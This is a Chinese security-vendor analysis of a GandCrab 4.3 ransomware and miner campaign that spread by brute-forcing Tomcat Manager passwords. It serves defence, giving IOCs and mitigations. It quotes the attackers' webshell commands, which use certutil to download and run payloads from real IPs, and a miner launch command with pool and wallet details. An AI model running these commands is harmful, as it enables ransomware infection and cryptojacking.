爆破Tomcat服务器,GandCrab 4.3勒索病毒成功入侵企业内网

本文涉及的产品
密钥管理服务KMS,1000个密钥,100个凭据,1个月
简介: 原文作者:腾讯电脑管家   原文地址:http://www.freebuf.com/articles/es/184424.html 前言近日,腾讯御见威胁情报中心拦截到专攻企业局域网的勒索病毒GandCrab,这个臭名昭著的勒索病毒版本号已升级到4.3。

原文作者:腾讯电脑管家   原文地址:http://www.freebuf.com/articles/es/184424.html 

前言

近日,腾讯御见威胁情报中心拦截到专攻企业局域网的勒索病毒GandCrab,这个臭名昭著的勒索病毒版本号已升级到4.3。与以往不同的是,攻击者在已入侵网络同时释放挖矿木马和勒索病毒,针对高价值目标使用GandCrab勒索病毒,而一般目标则运行挖矿木马,以最大限度利用被入侵的目标网络非法牟利。

一、概述

分析勒索病毒GandCrab 4.3的入侵通道,发现是黑客通过暴力破解Tomcat 服务器弱密码实现入侵。入侵成功后,从C2服务器下载勒索病毒和挖矿木马,恢复被GandCrab勒索病毒加密的文件需要付费499美元购买解密工具。通过钱包分析发现,该木马已收获18.6个门罗币,折合人民币约1.5万元。

GandCrab 勒索病毒之前的版本一般通过钓鱼邮件和水坑攻击(选择最可能接近目标的网络部署陷阱文件,等待目标网络内的主机下载)。而现在,御见威胁情报中心监测到越来越多的勒索病毒会首先从企业Web服务器下手,其中Tomcat被爆破弱密码攻击的情况近期有明显上升。

攻击一旦得手,黑客就会以此为跳板,继续向内网扩散。扩散的手法,往往是使用NSA攻击工具包或1433,3389端口暴力破解弱口令。之后,黑客会选择高价值目标下载运行勒索病毒,对一般系统,则植入挖矿木马获利。

通过详细技术分析发现本次入侵具有如下特点:

通过Tomcat Manager后台弱口令爆破攻击;病毒使用NSIS打包,病毒文件包中还有若干张美国总统特朗普的照片,猜测其意图是释放到文件夹中迷惑受害者;GandCrab勒索病毒V4使用salsa20的加密方式;病毒仅排除几个系统目录和配置文件不加密,其他文件均会被加密,被加密的文件后辍为KRAB;受害者须使用TOR浏览器登录暗网购买解密工具;入侵者内网释放init.exe矿机挖门罗币。

二、影响评级-高危

黑客首先会入侵企业Web服务器,之后再以此为跳板在内网释放勒索病毒和挖矿木马。除个别文件夹外,都被加密,除非得到密钥,受损文件无法解密还原。

三、入侵分析

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。

Tomcat提供了一个应用:manager,访问这个应用需要用户名和密码,用户名和密码存储在一个xml文件中。通过这个应用,辅助于Ftp,可以在远程通过Web部署和撤销应用。

通过此次受害者暴露在外网上的web日志发现。此次入侵通过Tomcat Manager后台弱口令进行爆破,爆破成功后,黑客上传了一个war包(jexws3.war),该war包中包含了一个Jsp webshell(jexws3.jsp),并且该webshell拥有最高权限。黑客通过Jsp webshell执行如下命令:

cmd.exe /c certutil.exe -urlcache -split -f http://85.192.92.5/info.exe %TEMP%/st.exe&cmd.exe /c %TEMP%:/st.exe

img_1d6fc6575bf388e8ad60324bb3fef737.jpe

img_d0267a357103e629a7e57ea5bfe2b279.jpe

img_b92e7dacefe9a902b281572067b8872f.jpe

四、勒索分析

黑客入侵成功执行命令后会从85.192.92.5地址下载info.exe,该文件为使用NSIS打包的GandCrab v4.3版本的勒索病毒,GandCrab勒索病毒自4.0开始使用salsa20加密方式,有一定概率能解密,但依然难度很大。若无备份进行恢复,又无法解密,会给企业带来重大损失。

安装包运行后会拉起msiexec进程并向其中写入恶意代码执行,使用白进程执行恶意PayLoad的方式一定程度上也增加了勒索病毒的隐蔽性。

img_af286983bdf73a03c01122b34ac4863f.jpe

病毒母体为NSIS安装包:

img_2e680923ea849ebe943043b4ed896696.jpe

安装包运行后启拷贝自身到Roaming目录运行然后动命令延时自删除:

img_21ee408882d1d315e7b118fc4d1325fc.jpe

Roaming目录病毒副本:

img_1560bd05e76e8a3354c56349dd637af7.jpe

病毒副本挂起方式启动msiexec进程并写入Shellcode:

img_5721c7db3ece1180314ed2033f314c34.jpe

远线程执行注入msiexec进程Shellcode:

img_283a7fdb5f7c12ec15dfe2ea5ee692db.jpe

Shellcode动态获取要使用的API:

img_d2f37b3e129abbd9380fc34c6efde9ee.jpe

Shllocde设置病毒注册表启动项:

img_9f1c495a3d98310bdbc72d5b92f00756.jpe

然后从内存中解密出病毒PayLoad执行:

img_90139995f6cddce46b31cba5e3f199cd.jpe

观察PayLoad明文可知病毒版本为v4.3版本:

img_9c62b81732de546e5d42d9e43748f6ac.jpe

病毒获取安全软件信息:

img_a47fd5db1e5f118c988a7cdfb8f1c712.jpe

获取机器信息:

img_f50bdb641a804775fbaa98ee2393b775.jpe

结束大量文件占用进程:

img_9419e82e965261f54ac219fc3eb9fb55.jpe

判断不加密文件:

desktop.iniautorun.infntuser.daticoncache.dbbootsect.bakboot.inintuser.dat.logthumbs.dbKRAB-DECRYPT.htmlKRAB-DECRYPT.txtCRAB-DECRYPT.txtntldrNTDETECT.COMBootfont.bin

img_23ba8729a18275ca8ab5286714b3c9af.jpe

不加密目录:

\ProgramData\\IETldCache\\Boot\\Program Files\\Tor Browser\\All Users\\Local Settings\\Windows\

img_56acb2b63702127ec7c119f99e025fd6.jpe

判断不加密机器国家语言:

422(乌克兰) 423(比利时) 428(塔吉克) 42c(阿塞拜疆) 437(格鲁吉亚) 43f(吉尔吉斯坦) 440(吉尔吉斯斯坦) 442(土库曼) 443(乌兹别克斯坦) 444(鞑靼斯坦) 818(未知) 819(未知) 82c(阿塞拜疆) 843(乌兹别克)

img_5a9b8c3eed8364a840419d80fd0bafcf.jpe

最后加密文件添加扩展后缀KRAB,并留言使用TOR浏览器进一步访问地址获取解密信息:

img_a8726767e2bcca770faa12929b4478f7.jpe

TOR 登录地址http://gandcrabmfe6mnef.onion/2f7a3eb776b9c9c2可知勒索者要求支付499美元的比特币或达世币购买解密工具

五、挖矿分析

在暴露的web日志中,发现在执行下载GandCrab后,通过jsp webshell又下载了其他样本,分析后发现下载的为开源矿机。

下载命令:

certutil.exe -urlcache -split -f "http://54.39.10.62:3000/init.exe" init.exe && START /B init.exe -r 500 -R 35 --donate-level 0 -o 139.162.15.153:3333 -u x -p x -k --nicehash -B

wsservice.exe -o pool.supportxmr.com:80 -u 42eDSCYj6uV45bETiPafUw4vabGZnCeCXAyJijh6LbvHYrvk6QC4VXeYmZUiP6ndemKPobHUt4n Dx19JdbWcUoZtHiML6du -p windows -k --donate-level=1

img_ee07030b880463dea32457f8e2b97587.jpe

img_b30e6e1c17d878ce7272f1541aa1581f.jpe

目前收益:

img_afe2edc0b63cfd5bc09a736600b4da28.jpe

受害者用户包含一些企业网站服务器和学校网站服务器。

img_743a612f0f1aa77597ea50b0bc2de7fb.jpe

img_6a66940e0a81136986c3f80ce752dac2.jpe

img_1dae3a2a8ac50304d101d90a922063a9.jpe

六、解决方案

调整Tomcat后台管理设置:修改管理后台默认页面路径,设置白名单限制登录,修改弱口令密码,避免服务运行高权限。

尽量关闭不必要的端口,如:445、135,139等,对3389端口可进行白名单配置,只允许白名单内的IP连接登陆。

尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。

采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。

对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。

建议全网安装终端安全管理系统(如腾讯御点:https://s.tencent.com/product/yd/index.html)。

img_c9202054ddbae9229e5cab37acccc04c.jpe

IOC

URL:

http://85.192.92.5/default.exehttp://85.192.92.5/info.exehttp://159.65.34.71/wow.exehttp://54.39.10.62:3000/init.exehttp://85.192.92.5/def.exehttp://85.192.92.5/zxcqwe.exe

IP:

85.192.92.5159.65.34.7154.39.10.62159.203.40.183193.169.252.25318.188.135.187

MD5:

35fadb783458c2c49f06ac6991362ec179efae89df0da2f395843007889c6ba3f18b892c15af71b3cfd2b33dae1016ba

相关文章
|
3月前
|
Java 应用服务中间件 Windows
windows服务器重装系统之后,Tomcat服务如何恢复?
windows服务器重装系统之后,Tomcat服务如何恢复?
63 10
|
2月前
|
安全 Java 应用服务中间件
【服务器知识】Tomcat简单入门
【服务器知识】Tomcat简单入门
|
4月前
|
应用服务中间件 Docker 容器
在服务器中使用Docker安装Tomcat、同时实现目录挂载、并且部署War包到服务器
这篇文章介绍了在Docker中安装Tomcat的过程,包括搜索Tomcat镜像、拉取镜像、目录挂载的准备、创建并挂载容器,以及如何进入容器和进行测试。文中还说明了如何将WAR包部署到Tomcat服务器并访问部署的应用。
在服务器中使用Docker安装Tomcat、同时实现目录挂载、并且部署War包到服务器
|
4月前
|
网络协议 Java 应用服务中间件
Tomcat源码分析 (一)----- 手撕Java Web服务器需要准备哪些工作
本文探讨了后端开发中Web服务器的重要性,特别是Tomcat框架的地位与作用。通过解析Tomcat的内部机制,文章引导读者理解其复杂性,并提出了一种实践方式——手工构建简易Web服务器,以此加深对Web服务器运作原理的认识。文章还详细介绍了HTTP协议的工作流程,包括请求与响应的具体格式,并通过Socket编程在Java中的应用实例,展示了客户端与服务器间的数据交换过程。最后,通过一个简单的Java Web服务器实现案例,说明了如何处理HTTP请求及响应,强调虽然构建基本的Web服务器相对直接,但诸如Tomcat这样的成熟框架提供了更为丰富和必要的功能。
|
5月前
|
SQL 弹性计算 关系型数据库
PolarDB产品使用问题之如何和ECS实例实现内网互通
PolarDB产品使用合集涵盖了从创建与管理、数据管理、性能优化与诊断、安全与合规到生态与集成、运维与支持等全方位的功能和服务,旨在帮助企业轻松构建高可用、高性能且易于管理的数据库环境,满足不同业务场景的需求。用户可以通过阿里云控制台、API、SDK等方式便捷地使用这些功能,实现数据库的高效运维与持续优化。
|
4月前
|
Java 应用服务中间件 Apache
在 Debian 服务器上安装和配置 Apache Tomcat 的方法
在 Debian 服务器上安装和配置 Apache Tomcat 的方法
66 0
|
5月前
|
NoSQL 关系型数据库 MySQL
多机部署:打造内网服务器集群
在多机部署教程中,了解如何配置分布式应用如Laravel以使用Redis同步用户状态。关键步骤包括:修改MySQL的`bind-address`至内网IP,重启服务;同样修改Redis的`bind`,重启服务;以及调整Elasticsearch的`network.host`和`discovery.seed_hosts`,并重启。通过这些步骤,确保服务间能内网通信,实现多服务器状态同步。
158 2
|
6月前
|
Java 关系型数据库 MySQL
杨校老师课堂之Java项目部署到云端服务器之安装MySQL、Jdk、Tomcat
杨校老师课堂之Java项目部署到云端服务器之安装MySQL、Jdk、Tomcat
62 0
杨校老师课堂之Java项目部署到云端服务器之安装MySQL、Jdk、Tomcat
|
16天前
|
人工智能 弹性计算 编解码
阿里云GPU云服务器性能、应用场景及收费标准和活动价格参考
GPU云服务器作为阿里云提供的一种高性能计算服务,通过结合GPU与CPU的计算能力,为用户在人工智能、高性能计算等领域提供了强大的支持。其具备覆盖范围广、超强计算能力、网络性能出色等优势,且计费方式灵活多样,能够满足不同用户的需求。目前用户购买阿里云gpu云服务器gn5 规格族(P100-16G)、gn6i 规格族(T4-16G)、gn6v 规格族(V100-16G)有优惠,本文为大家详细介绍阿里云gpu云服务器的相关性能及收费标准与最新活动价格情况,以供参考和选择。
|
21天前
|
机器学习/深度学习 人工智能 弹性计算
什么是阿里云GPU云服务器?GPU服务器优势、使用和租赁费用整理
阿里云GPU云服务器提供强大的GPU算力,适用于深度学习、科学计算、图形可视化和视频处理等多种场景。作为亚太领先的云服务提供商,阿里云的GPU云服务器具备灵活的资源配置、高安全性和易用性,支持多种计费模式,帮助企业高效应对计算密集型任务。